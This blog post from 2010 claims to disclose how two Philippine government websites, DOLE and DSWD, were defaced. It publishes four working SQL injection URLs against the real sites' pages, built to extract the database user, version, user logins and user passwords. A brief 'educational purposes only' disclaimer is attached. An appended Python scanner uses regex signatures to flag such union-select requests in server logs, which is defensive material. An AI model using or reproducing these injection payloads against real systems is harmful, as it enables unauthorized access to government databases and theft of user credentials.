Sunday, January 10, 2010

Full Disclosure: Defaced Philippine Government Websites

Now that the DOLE and DSWD websites have been "fixed" by their highly "competent" employees days after the defacing incidents happened, it is only proper that the rest of us techies find out the details of what really happened. So without further delay, here is the actual code probably used to obtain admin rights (note: for educational purposes only), which has been floating around the net for several months already. Enjoy.

http://www.dole.gov.ph/secondpage.php?id=-1+union+select+1,2,user%28%29,4,database%28%29,version%28%29,7,8,9--

http://www.dswd.gov.ph/faqdetails.php?id=-47%20union%20select%201,2,convert(user_login+using+utf8),4,5,6+from+benz_rb.users

http://www.dswd.gov.ph/faqdetails.php?id=-47%20union%20select%201,2,convert(user_password+using+utf8),4,5,6+from+benz_rb.users

http://www.dswd.gov.ph/articledetails.php?id=-1144+union+select+1,2,3,4,version(),6--
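For anyone reviewing web server logs for requests of this shape, here is an added example (not code from this post or from the affected sites) of a Python check that URL-decodes each request and flags `id` values that are not plain digits, tagging the reason. The sample requests are constructed, and the parameter set `NUMERIC_PARAMS` and the signature names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters expected to hold a plain row id (assumption for this example).
NUMERIC_PARAMS = {"id"}

# Signatures for the request shapes listed above, applied after URL decoding.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "info_function": re.compile(r"\b(?:user|database|version)\s*\(\s*\)", re.I),
    "cross_db_table": re.compile(r"\bfrom\s+\w+\.\w+", re.I),
    "sql_comment": re.compile(r"--|/\*"),
}

# Constructed sample request lines (not taken from any real access log).
SAMPLE_REQUESTS = [
    "/page.php?id=47",
    "/page.php?id=-1+union+select+1,2,user%28%29,4--",
    "/page.php?id=-47%20union%20select%201,convert(col+using+utf8),3+from+db.tbl",
    "/search.php?q=credit+union+select+committee",
    "/page.php?id=abc",
]

def inspect_request(url):
    """Return [(param, [reasons])] for id-style parameters that are not plain digits."""
    findings = []
    # parse_qs decodes both %20 and '+' to spaces, so either encoding is caught.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        if name.lower() not in NUMERIC_PARAMS:
            continue  # free-text fields are out of scope for this check
        for value in values:
            if re.fullmatch(r"[0-9]+", value):
                continue  # well-formed id
            hits = [tag for tag, rx in SIGNATURES.items() if rx.search(value)]
            findings.append((name, hits or ["non_numeric_id"]))
    return findings

def scan(requests):
    """Map each flagged request to its findings; clean requests are omitted."""
    return {r: f for r in requests if (f := inspect_request(r))}

if __name__ == "__main__":
    for request, findings in scan(SAMPLE_REQUESTS).items():
        print(request, findings)
```

The signatures only label why a request was flagged; the decision itself is the digits-only check, which is also what the server-side code should enforce before the value reaches a query.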
